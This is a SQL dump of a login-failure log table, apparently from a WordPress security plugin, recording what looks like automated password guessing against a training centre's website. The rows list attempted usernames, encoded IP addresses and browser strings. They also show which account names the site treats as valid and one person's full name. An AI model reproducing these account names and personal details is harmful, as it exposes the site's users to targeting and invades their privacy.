(99770, 1493317334.039030, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99771, 1493318369.382876, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99772, 1493318538.194433, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149676724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99773, 1493318539.424238, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3149676724, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99774, 1493319386.916395, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99775, 1493320110.126423, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 621184356, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99776, 1493320389.367811, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99777, 1493321404.031064, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99778, 1493322408.295330, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99779, 1493323425.866678, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99780, 1493324421.114489, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99781, 1493324905.890788, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3158086909, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99782, 1493324907.051485, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3158086909, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99783, 1493325432.090606, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99784, 1493326437.463267, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99785, 1493327446.169706, 1, 'loginFailInvalidUsername', 'administrator', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99786, 1493328325.705197, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042965342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99787, 1493328327.291990, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3042965342, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99788, 1493328437.046868, 1, 'loginFailInvalidUsername', 'webmaster', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99789, 1493329429.464384, 1, 'loginFailInvalidUsername', 'developer', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99790, 1493330452.647406, 1, 'loginFailInvalidUsername', 'CROSSTRAININGCENTER', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99791, 1493331446.408608, 1, 'loginFailValidUsername', 'admin', 1, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99792, 1493332454.674997, 1, 'loginFailInvalidUsername', 'superadmin', 0, 1589523921, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99793, 1493338862.609162, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2037978292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99794, 1493338865.146532, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2037978292, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99795, 1493339268.510022, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99796, 1493339270.207276, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3033986906, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99797, 1493340938.359187, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3412761521, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99798, 1493341348.235406, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1668664551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99799, 1493341349.524190, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1668664551, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99800, 1493344007.284333, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3110329374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1');
INSERT INTO `www2_wfLogins` (`id`, `ctime`, `fail`, `action`, `username`, `userID`, `IP`, `UA`) VALUES
(99801, 1493344009.286757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3110329374, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99802, 1493345413.495871, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2985971885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99803, 1493345415.056605, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2985971885, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99804, 1493351968.903016, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 831636304, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99805, 1493352643.741791, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 702768013, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99806, 1493357447.103721, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835452949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99807, 1493357448.359869, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 835452949, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99808, 1493358147.643555, 1, 'loginFailValidUsername', 'julie', 2, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99809, 1493358148.367695, 1, 'loginFailValidUsername', 'julie', 2, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99810, 1493358149.025040, 1, 'loginFailInvalidUsername', 'julie pierrard', 0, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99811, 1493358149.737459, 1, 'loginFailValidUsername', 'pablo', 3, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99812, 1493358150.813316, 1, 'loginFailValidUsername', 'admin', 1, 3562253049, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99813, 1493361722.804791, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657683608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99814, 1493361724.352773, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 657683608, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99815, 1493363740.702674, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2978051518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99816, 1493363742.136053, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2978051518, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99817, 1493364254.670792, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1730630359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99818, 1493364255.826627, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1730630359, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99819, 1493371651.314233, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1507036977, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99820, 1493371652.577088, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1507036977, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99821, 1493375030.450938, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1816093533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99822, 1493375031.595245, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1816093533, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99823, 1493375157.830307, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 624429088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99824, 1493375158.969483, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 624429088, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99825, 1493376484.681008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741416040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99826, 1493376488.984570, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1741416040, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99827, 1493385140.700013, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970821136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99828, 1493385142.091386, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2970821136, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99829, 1493385389.831624, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321281790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99830, 1493385390.994283, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3321281790, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99831, 1493386238.339897, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2873895206, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99832, 1493389947.630900, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1333959350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99833, 1493389948.760266, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1333959350, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99834, 1493390429.844275, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744105710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99835, 1493390452.902341, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1744105710, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99836, 1493392355.430652, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182244527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99837, 1493392356.693479, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3182244527, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99838, 1493397549.913929, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1552456972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99839, 1493397550.891528, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1552456972, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99840, 1493400611.429800, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3038516965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99841, 1493400612.960393, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3038516965, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99842, 1493402564.466583, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 691605825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99843, 1493402565.985790, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 691605825, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99844, 1493404013.136868, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2058018895, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99845, 1493404308.669808, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598921172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99846, 1493404309.820609, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1598921172, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99847, 1493404402.376977, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3183809589, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99848, 1493404403.849907, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3183809589, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99849, 1493406998.613961, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3097359640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99850, 1493406999.998515, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3097359640, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99851, 1493408056.922278, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 628174571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99852, 1493408057.933638, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 628174571, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99853, 1493409066.997027, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588503380, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99854, 1493409068.125387, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2588503380, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99855, 1493410002.375944, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 608761984, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99856, 1493412245.380434, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1423703127, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99857, 1493412246.433561, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1423703127, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99858, 1493412844.731184, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2962005175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99859, 1493412845.849494, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2962005175, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99860, 1493414253.657376, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1405595591, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99861, 1493414254.740541, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1405595591, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99862, 1493416452.559225, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1224509939, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99863, 1493416454.235016, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1224509939, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99864, 1493416523.533757, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 762636327, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99865, 1493416524.802215, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 762636327, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99866, 1493416810.557915, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1549131029, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99867, 1493423641.485081, 1, 'loginFailValidUsername', 'admin', 1, 3188441888, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99868, 1493425785.414661, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3197714889, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99869, 1493426749.353040, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335024381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99870, 1493426750.337042, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1335024381, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99871, 1493427777.933105, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2979895540, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99872, 1493428838.330995, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693585834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99873, 1493428839.863732, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 693585834, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99874, 1493433332.625813, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3039577960, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99875, 1493436060.374546, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 3304677463, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99876, 1493437257.232909, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2995212956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99877, 1493437260.039374, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 2995212956, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99878, 1493439195.454008, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1023584817, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99879, 1493439696.369036, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1430349643, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99880, 1493440366.387893, 1, 'loginFailInvalidUsername', 'crosstrainingcenter', 0, 1149515385, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1'),
(99881, 1493496282.333355, 1, 'loginFailValidUsername', 'admin', 1, 3582777388, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99882, 1493562114.733778, 1, 'loginFailValidUsername', 'admin', 1, 3001689384, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99883, 1493585893.810756, 1, 'loginFailInvalidUsername', 'vous', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99884, 1493585895.714882, 1, 'loginFailInvalidUsername', 'training', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99885, 1493585897.525391, 1, 'loginFailInvalidUsername', 'notre', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99886, 1493585899.323028, 1, 'loginFailInvalidUsername', 'pour', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99887, 1493585901.158223, 1, 'loginFailInvalidUsername', 'cross', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99888, 1493585902.978870, 1, 'loginFailInvalidUsername', 'objectifs', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99889, 1493585904.797967, 1, 'loginFailInvalidUsername', 'venez', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99890, 1493585906.633593, 1, 'loginFailInvalidUsername', 'outils', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99891, 1493585908.619351, 1, 'loginFailInvalidUsername', 'professionnel', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99892, 1493585910.447010, 1, 'loginFailInvalidUsername', 'travail', 0, 1137510410, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99893, 1493591700.921902, 1, 'loginFailInvalidUsername', 'namur', 0, 2917961944, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99894, 1493626137.224726, 1, 'loginFailValidUsername', 'admin', 1, 1847862398, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99895, 1493671338.260997, 1, 'loginFailValidUsername', 'julie', 2, 3195004720, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.89 Safari/537.36'),
(99896, 1493702146.011968, 1, 'loginFailValidUsername', 'admin', 1, 701148681, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99897, 1493702333.036758, 1, 'loginFailInvalidUsername', 'namur', 0, 773229120, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99898, 1493805430.592544, 1, 'loginFailInvalidUsername', 'namur', 0, 1571457074, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99899, 1493805944.905122, 1, 'loginFailInvalidUsername', 'testuser', 0, 794450239, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99900, 1493806833.266184, 1, 'loginFailValidUsername', 'julie', 2, 3326600728, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99901, 1493806977.416967, 1, 'loginFailInvalidUsername', 'professionnel', 0, 3644686526, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99902, 1493895021.286080, 1, 'loginFailValidUsername', 'admin', 1, 2249451015, 'Mozilla/5.0 (Windows NT 5.1; rv:29.0) Gecko/20100101 Firefox/29.0'),
(99903, 1493945486.515088, 1, 'loginFailInvalidUsername', 'pour', 0, 3497113801, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99904, 1493945943.289898, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99905, 1493945945.142394, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99906, 1493945946.968033, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99907, 1493945948.794980, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99908, 1493945950.609365, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99909, 1493945952.586529, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
(99910, 1493945954.730453, 1, 'loginFailInvalidUsername', 'guest', 0, 2760129448, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1'),
